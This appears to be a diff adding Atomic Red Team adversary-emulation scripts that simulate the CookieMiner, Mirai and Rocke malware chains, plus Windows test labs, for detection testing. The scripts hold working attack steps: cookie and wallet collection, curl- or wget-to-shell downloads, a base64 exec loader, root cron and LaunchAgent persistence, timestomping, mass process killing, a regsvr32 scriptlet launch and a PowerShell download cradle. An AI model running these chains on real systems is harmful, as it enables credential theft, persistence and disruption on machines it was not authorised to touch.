<string>import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly9hdG9taWNyZWR0ZWFtLmlvJzt0PScvbmV3cy5waHAnO3JlcT11cmxsaWIyLlJlcXVlc3Qoc2VydmVyK3QpOwpyZXEuYWRkX2hlYWRlcignVXNlci1BZ2VudCcsVUEpOwpyZXEuYWRkX2hlYWRlcignQ29va2llJywic2Vzc2lvbj1CbUhpVzdVQS9zZjlDMjc5b0Uyb3dLOUxaMGM9Iik7CnByb3h5ID0gdXJsbGliMi5Qcm94eUhhbmRsZXIoKTsKbyA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHByb3h5KTsKdXJsbGliMi5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIyLnVybG9wZW4ocmVxKS5yZWFkKCk7'));</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
@@ -0,0 +1,14 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>ProgramArguments</key>
<array>
<string>/Users/Shared/xmrig2</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>Label</key>
<string>cookie-miner-payload-launchagent.plist</string>
</dict>
</plist>
@@ -0,0 +1,49 @@
#! /bin/bash
# Chain reaction simulating the macOS "CookieMiner" malware behavior chain.
# Atomic Red Team artifact: every payload fetched below is a benign test
# binary/script hosted in the redcanaryco/atomic-red-team repository.
# Tactic: Discovery
# Technique: T1033 - System Owner/User Discovery
OUTPUT="$(id -un)"
# Tactic: Collection
# Technique: T1005 - Data from Local System
# Look for Coinbase session cookies in Safari's binary cookie store.
cd ~/Library/Cookies
grep -q "coinbase" "Cookies.binarycookies"
# Tactic: Collection
# Technique: T1074 - Data Staged
# Stage the cookie store in a directory named after the current user.
mkdir ${OUTPUT}
cp Cookies.binarycookies ${OUTPUT}/Cookies.binarycookies
# Tactic: Exfiltration
# Technique: T1002 - Data Compressed
zip -r interestingsafaricookies.zip ${OUTPUT}
# Tactic: Exfiltration
# Technique: T1048 - Exfiltration Over Alternative Protocol
# Simulate network connection for exfiltration
curl https://atomicredteam.io > /dev/null
# NOTE(review): '|' binds tighter than '||', so when the curl succeeds its
# output goes to stdout and is NOT piped into python; only the wget fallback
# actually feeds python. The trailing `` is an empty command substitution
# (a no-op). Compare the "(curl || wget) | ..." grouping used by the
# rocke-and-roll-stage-01 script.
curl --silent https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py | python - ``
# Tactic: Discovery
# Technique: T1083 - File and Directory Discovery
find ~ -name "*wallet*" > interestingfiles.txt
cp interestingfiles.txt ${OUTPUT}/interestingfiles.txt
# Tactic: Persistence
# Technique: T1159 - Launch Agent
# Install two LaunchAgents: one re-launching the beacon payload, one for the
# fake miner binary dropped below.
mkdir -p ~/Library/LaunchAgents
cd ~/Library/LaunchAgents
curl --silent -o com.apple.rig2.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist
curl --silent -o com.proxy.initialize.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist
launchctl load -w com.apple.rig2.plist
launchctl load -w com.proxy.initialize.plist
cd /Users/Shared
# "xmrig2" mimics the XMRig coin miner name; the download is atomic-hello.
curl --silent -o xmrig2 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello.macos
# Tactic: Defense Evasion
# Technique: T1222 - File Permissions Modification
chmod +x ./xmrig2
./xmrig2
@@ -0,0 +1,25 @@
# cookie-miner-stage-02.py -- second stage of the simulated CookieMiner chain.
# The commented-out block below is the human-readable (deobfuscated) form of
# the base64 payload that the final line decodes and exec()s: it exits if the
# Little Snitch firewall appears in the process list, then issues one benign
# HTTP request to atomicredteam.io carrying a hard-coded session cookie.
# NOTE(review): the payload uses urllib2, so it requires Python 2 to run.
# import sys;import re, subprocess;cmd = "ps -ef | grep Little\ Snitch | grep -v grep"
# ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
# out = ps.stdout.read()
# ps.stdout.close()
# if re.search("Little Snitch", out):
# sys.exit()
# import urllib2;
# UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http://atomicredteam.io';t='/news.php';req=urllib2.Request(server+t);
# req.add_header('User-Agent',UA);
# req.add_header('Cookie',"session=BmHiW7UA/sf9C279oE2owK9LZ0c=");
# proxy = urllib2.ProxyHandler();
# o = urllib2.build_opener(proxy);
# urllib2.install_opener(o);
# a=urllib2.urlopen(req).read();
# Tactic: Defense Evasion
# Technique: T1140 - Deobfuscate/Decode Files or Information
#
# Tactic: Discovery
# Technique: T1057 - Process Discovery
#
# Tactic: Command and Control
# Technique: T1043 - Commonly Used Port
#
# The single statement below is the same base64 payload embedded in
# cookie-miner-backdoor-launchagent.plist; keep the two copies in sync.
import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly9hdG9taWNyZWR0ZWFtLmlvJzt0PScvbmV3cy5waHAnO3JlcT11cmxsaWIyLlJlcXVlc3Qoc2VydmVyK3QpOwpyZXEuYWRkX2hlYWRlcignVXNlci1BZ2VudCcsVUEpOwpyZXEuYWRkX2hlYWRlcignQ29va2llJywic2Vzc2lvbj1CbUhpVzdVQS9zZjlDMjc5b0Uyb3dLOUxaMGM9Iik7CnByb3h5ID0gdXJsbGliMi5Qcm94eUhhbmRsZXIoKTsKbyA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHByb3h5KTsKdXJsbGliMi5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIyLnVybG9wZW4ocmVxKS5yZWFkKCk7'))
+17
View File
@@ -0,0 +1,17 @@
#! /bin/bash
# Chain reaction simulating a Mirai-style dropper: pick the first writable
# working directory, download a per-architecture payload, run it, delete it.
# The payload is the benign Atomic Red Team "atomic-hello" test binary.
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
# Tactic: Discovery
# Technique: T1082 - System Information discovery
# Machine hardware name (e.g. x86_64) becomes the payload's file extension,
# mirroring Mirai's per-architecture binary naming scheme.
MIRAI_EXT=`uname -m`
wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -O mirai.$MIRAI_EXT
# Tactic: Defense Evasion
# Technique: T1222 - File Permissions Modification
chmod +x mirai.$MIRAI_EXT
./mirai.$MIRAI_EXT
# Tactic: Defense Evasion
# Technique: T1107 - File Deletion
rm -rf mirai.$MIRAI_EXT
@@ -0,0 +1,10 @@
#! /bin/bash
# Rocke and Roll, Stage 01: fetch the base64-encoded Stage 02 script and pipe
# it through base64 -d into bash, emulating Rocke's obfuscated loader.
# Tactic: Defense Evasion
# Technique: T1027 - Obfuscated Files or Information
bash -c "(curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh)|base64 -d |/bin/bash"
# If you want to skip the base64 process, uncomment the following line:
# bash -c "(curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|/bin/bash"
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 01" >> /tmp/atomic.log
@@ -0,0 +1,81 @@
IyEgL2Jpbi9iYXNoCgpmdW5jdGlvbiBjKCkgewpwa2lsbCAtZiBzb3VycGx1bQpwa2lsbCAtZiB4
bXJpZwpwa2lsbCAtZiBjcnlwdG9uaWdodApwa2lsbCAtZiBzdHJhdHVtCnBraWxsIC1mIG1peG5l
cmR4CnBraWxsIC1mIG1pbmV4bXIKcGtpbGwgLWYgbWluZXJkCnBraWxsIC1mIG1pbmVyZ2F0ZQpw
a2lsbCAtZiBrd29ya2VyMzQKcGtpbGwgLWYgWGJhc2gKCiMgICBUYWN0aWM6IERlZmVuc2UgRXZh
c2lvbgojICAgVGVjaG5pcXVlOiBUMTIyMiAtIEZpbGUgUGVybWlzc2lvbiBNb2RpZmljYXRpb24K
Y2hhdHRyIC1pIC90bXAva3dvcmtlcmRzIC92YXIvdG1wL2t3b3JrZXJkcwoKIyAgIFRhY3RpYzog
RGVmZW5zZSBFdmFzaW9uCiMgICBUZWNobmlxdWU6IFQxMTA3IC0gRmlsZSBEZWxldGlvbgpybSAt
cmYgL3RtcC9rd29ya2VyZHMgL3Zhci90bXAva3dvcmtlcmRzCgojICAgVGFjdGljOiBEaXNjb3Zl
cnkKIyAgIFRlY2huaXF1ZTogVDEwNTcgLSBQcm9jZXNzIERpc2NvdmVyeQpwcyBhdXhmfGdyZXAg
LXYgZ3JlcHxncmVwIC12ICJcXyIgfGdyZXAgLXYgImt0aHJlYWRkIiB8Z3JlcCAiXFsuKlxdInxh
d2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkgPi9kZXYvbnVsbCAyPiYxCnBzIGF1eGZ8Z3Jl
cCAtdiBncmVwfGdyZXAgInhtcmlnIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+
L2Rldi9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAiWGJhc2giIHwgYXdrICd7
cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpwcyBhdXhmfGdyZXAgLXYg
Z3JlcHxncmVwICJzdHJhdHVtIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rl
di9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAieG1yIiB8IGF3ayAne3ByaW50
ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8
Z3JlcCAibWluZXJkIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxs
IDI+JjEKCiMgICBUYWN0aWM6IERpc2NvdmVyeQojICAgVGVjaG5pcXVlOiBUMTA0OSAtIFN5c3Rl
bSBOZXR3b3JrIENvbm5lY3Rpb25zIERpc2NvdmVyeQpuZXRzdGF0IC1hbnAgfCBncmVwIDozMzMz
IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxs
IC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDo0NDQ0IHxhd2sgJ3twcmlu
dCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251
bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDo1NTU1IHxhd2sgJ3twcmludCAkN30nfCBhd2sg
LUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRz
dGF0IC1hbnAgfCBncmVwIDo2NjY2IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3By
aW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBn
cmVwIDo3Nzc3IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4
YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDozMzQ3IHxh
d2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05
ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDoxNDQ0NCB8YXdrICd7cHJpbnQg
JDd9J3wgYXdrIC1GJ1svXScgJ3twcmludCAkMX0nIHwgeGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxs
IDI+JjEKbmV0c3RhdCAtYW5wIHwgZ3JlcCA6MTQ0MzMgfGF3ayAne3ByaW50ICQ3fSd8IGF3ayAt
RidbL10nICd7cHJpbnQgJDF9JyB8IHhhcmdzIGtpbGwgLTkgPi9kZXYvbnVsbCAyPiYxCgplY2hv
ICQoZGF0ZSAtdSkgIkV4ZWN1dGVkIEF0b21pYyBSZWQgVGVhbSBSb2NrZSBhbmQgUm9sbCwgU3Rh
Z2UgMDIsIHBhcnQgQyIgPj4gL3RtcC9hdG9taWMubG9nCn0KCmZ1bmN0aW9uIGIoKSB7CiAgICBt
a2RpciAtcCAvdmFyL3RtcAoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lvbgogICAgIyAg
IFRlY2huaXF1ZTogVDEyMjIgLSBGaWxlIFBlcm1pc3Npb24gTW9kaWZpY2F0aW9uCiAgICBjaG1v
ZCAxNzc3IC92YXIvdG1wCgogICAgIyAgIFRhY3RpYzogRGVmZW5zZSBFdmFzaW9uCiAgICAjICAg
VGVjaG5pcXVlOiBUMTAzNiAtIE1hc3F1ZXJhZGluZwogICAgKGN1cmwgLWZzU0wgLS1jb25uZWN0
LXRpbWVvdXQgMTIwIGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnlj
by9hdG9taWMtcmVkLXRlYW0vbWFzdGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvYXRvbWlj
LWhlbGxvIC1vIC92YXIvdG1wL2t3b3JrZXJkc3x8d2dldCBodHRwczovL3Jhdy5naXRodWJ1c2Vy
Y29udGVudC5jb20vcmVkY2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMv
Q2hhaW5fUmVhY3Rpb25zL2F0b21pYy1oZWxsbyAtTyAvdmFyL3RtcC9rd29ya2VyZHMpICYmIGNo
bW9kICt4IC92YXIvdG1wL2t3b3JrZXJkcwogICAgbm9odXAgL3Zhci90bXAva3dvcmtlcmRzID4v
ZGV2L251bGwgMj4mMSAmCgogICAgZWNobyAkKGRhdGUgLXUpICJFeGVjdXRlZCBBdG9taWMgUmVk
IFRlYW0gUm9ja2UgYW5kIFJvbGwsIFN0YWdlIDAyLCBwYXJ0IEIiID4+IC90bXAvYXRvbWljLmxv
Zwp9CgpmdW5jdGlvbiBhKCkgewoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lvbgogICAg
IyAgIFRlY2huaXF1ZTogVDEyMjIgLSBGaWxlIFBlcm1pc3Npb24gTW9kaWZpY2F0aW9uCgljaGF0
dHIgLWkgL2V0Yy9jcm9uLmQvcm9vdCAvdmFyL3Nwb29sL2Nyb24vcm9vdCAvdmFyL3Nwb29sL2Ny
b24vY3JvbnRhYnMvcm9vdAoKICAgICMgICBUYWN0aWM6IFBlcnNpc3RlbmNlCiAgICAjICAgVGVj
aG5pcXVlOiBUMTE2OCAtIExvY2FsIEpvYiBTY2hlZHVsaW5nCgllY2hvIC1lICIqLzEwICogKiAq
ICogcm9vdCAoY3VybCAtZnNTTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmVk
Y2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMvQ2hhaW5fUmVhY3Rpb25z
L3JvY2tlLWFuZC1yb2xsLXN0YWdlLTAyLWRlY29kZWQuc2h8fHdnZXQgLXEgLU8tIGh0dHBzOi8v
cmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFz
dGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVj
b2RlZC5zaCl8c2hcbiMjIiA+IC9ldGMvY3Jvbi5kL3Jvb3QKCW1rZGlyIC1wIC92YXIvc3Bvb2wv
Y3Jvbi9jcm9udGFicwoJZWNobyAtZSAiKi8zMSAqICogKiAqIChjdXJsIC1mc1NMIGh0dHBzOi8v
cmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFz
dGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVj
b2RlZC5zaHx8d2dldCAtcSAtTy0gaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Jl
ZGNhbmFyeWNvL2F0b21pYy1yZWQtdGVhbS9tYXN0ZXIvQVJUaWZhY3RzL0NoYWluX1JlYWN0aW9u
cy9yb2NrZS1hbmQtcm9sbC1zdGFnZS0wMi1kZWNvZGVkLnNoKXxzaFxuIyMiID4gL3Zhci9zcG9v
bC9jcm9uL2Nyb250YWJzL3Jvb3QKCW1rZGlyIC1wIC9ldGMvY3Jvbi5kYWlseQoJKGN1cmwgLWZz
U0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNv
bS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFzdGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFj
dGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVjb2RlZC5zaCAtbyAvZXRjL2Nyb24uZGFp
bHkvb2FuYWNyb25lcnx8d2dldCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmVk
Y2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMvQ2hhaW5fUmVhY3Rpb25z
L3JvY2tlLWFuZC1yb2xsLXN0YWdlLTAyLWRlY29kZWQuc2ggLU8gL2V0Yy9jcm9uLmRhaWx5L29h
bmFjcm9uZXIpCgogICAgIyAgIFRhY3RpYzogRGVmZW5zZSBFdmFzaW9uCiAgICAjICAgVGVjaG5p
cXVlOiBUMTIyMiAtIEZpbGUgUGVybWlzc2lvbiBNb2RpZmljYXRpb24KICAgIGNobW9kIDc1NSAv
ZXRjL2Nyb24uZGFpbHkvb2FuYWNyb25lcgoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lv
bgogICAgIyAgIFRlY2huaXF1ZTogVDEwOTkgLSBUaW1lc3RvbXAKCXRvdWNoIC1hY21yIC9iaW4v
c2ggL2V0Yy9jcm9uLmRhaWx5L29hbmFjcm9uZXIKICAgIHRvdWNoIC1hY21yIC9iaW4vc2ggL2V0
Yy9jcm9uLmQvcm9vdAogICAgdG91Y2ggLWFjbXIgL2Jpbi9zaCAvdmFyL3Nwb29sL2Nyb24vY3Jv
bnRhYnMvcm9vdAoKICAgIGVjaG8gJChkYXRlIC11KSAiRXhlY3V0ZWQgQXRvbWljIFJlZCBUZWFt
IFJvY2tlIGFuZCBSb2xsLCBTdGFnZSAwMiwgcGFydCBBIiA+PiAvdG1wL2F0b21pYy5sb2cKfQoK
YQpiCmM=
@@ -0,0 +1,90 @@
#! /bin/bash
# Rocke and Roll, Stage 02 (decoded form). This file is the plaintext twin of
# rocke-and-roll-stage-02-base64.sh; keep the two artifacts in sync.
# Stage 02, part C: kill competing coin miners and any process listening on
# common mining ports, mimicking Rocke's "eliminate the competition" step.
# WARNING: the kill logic is aggressive -- run only on disposable test hosts.
function c() {
# Kill well-known miner process names by pattern (benign on a clean host:
# pkill simply matches nothing).
pkill -f sourplum
pkill -f xmrig
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f minexmr
pkill -f minerd
pkill -f minergate
pkill -f kworker34
pkill -f Xbash
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
# Clear the immutable flag so the dropped files can be removed below.
chattr -i /tmp/kworkerds /var/tmp/kworkerds
# Tactic: Defense Evasion
# Technique: T1107 - File Deletion
rm -rf /tmp/kworkerds /var/tmp/kworkerds
# Tactic: Discovery
# Technique: T1057 - Process Discovery
# NOTE(review): the first pipeline kill -9s any bracketed "[name]" process
# other than kthreadd, which can include legitimate kernel threads.
ps auxf|grep -v grep|grep -v "\_" |grep -v "kthreadd" |grep "\[.*\]"|awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "Xbash" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "stratum" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "minerd" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
# Tactic: Discovery
# Technique: T1049 - System Network Connections Discovery
# Kill the owning PID (column 7, "pid/name") of connections on typical
# stratum/mining ports.
netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :14433 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part C" >> /tmp/atomic.log
}
# Stage 02, part B: drop the benign "atomic-hello" payload masquerading under
# the kernel-thread-like name "kworkerds" and start it in the background.
function b() {
mkdir -p /var/tmp
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chmod 1777 /var/tmp
# Tactic: Defense Evasion
# Technique: T1036 - Masquerading
# curl with wget fallback; chmod +x runs only if a download succeeded.
(curl -fsSL --connect-timeout 120 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -o /var/tmp/kworkerds||wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -O /var/tmp/kworkerds) && chmod +x /var/tmp/kworkerds
nohup /var/tmp/kworkerds >/dev/null 2>&1 &
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part B" >> /tmp/atomic.log
}
# Stage 02, part A: establish cron-based persistence that periodically
# re-downloads and re-runs this script, then timestomp the dropped cron files
# to match /bin/sh so their creation is less conspicuous.
function a() {
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
# Clear the immutable flag so the cron entries can be (re)written.
chattr -i /etc/cron.d/root /var/spool/cron/root /var/spool/cron/crontabs/root
# Tactic: Persistence
# Technique: T1168 - Local Job Scheduling
echo -e "*/10 * * * * root (curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh||wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|sh\n##" > /etc/cron.d/root
mkdir -p /var/spool/cron/crontabs
echo -e "*/31 * * * * (curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh||wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|sh\n##" > /var/spool/cron/crontabs/root
mkdir -p /etc/cron.daily
(curl -fsSL --connect-timeout 120 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh -o /etc/cron.daily/oanacroner||wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh -O /etc/cron.daily/oanacroner)
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chmod 755 /etc/cron.daily/oanacroner
# Tactic: Defense Evasion
# Technique: T1099 - Timestomp
# Copy /bin/sh's access/modify times onto the dropped cron files.
touch -acmr /bin/sh /etc/cron.daily/oanacroner
touch -acmr /bin/sh /etc/cron.d/root
touch -acmr /bin/sh /var/spool/cron/crontabs/root
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part A" >> /tmp/atomic.log
}
# Run the parts in order: cron persistence (a), payload drop (b),
# competitor-miner cleanup (c).
a
b
c
+36
View File
@@ -0,0 +1,36 @@
:: Basic Test Lab One
:: Squiblydoo (T1117): regsvr32 executes a remote scriptlet via scrobj.dll.
:: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct
::
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
:: Lab Two
:: Chain Reactions - Chaining Multiple Atomic Tests
:: Let's have some fun, shall we ;-)
:: Techniques rarely occur in isolation
:: In this attack, let's combine 3 techniques
:: You can customize tests
:: Step 1. A payload executes Regsvr32.exe as seen in Lab One T1117
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll
:: Step 2. This payload will execute a discovery sequence T1087
:: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat
:: Alternate Endings ;-) => powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')"
:: Account, share, autorun-registry, WMI, and network discovery in one line:
net user Administrator /domain & net Accounts & net localgroup administrators & net use & net share & net group "domain admins" /domain & net config workstation & net accounts & net accounts /domain & net view & reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit & reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad & reg query 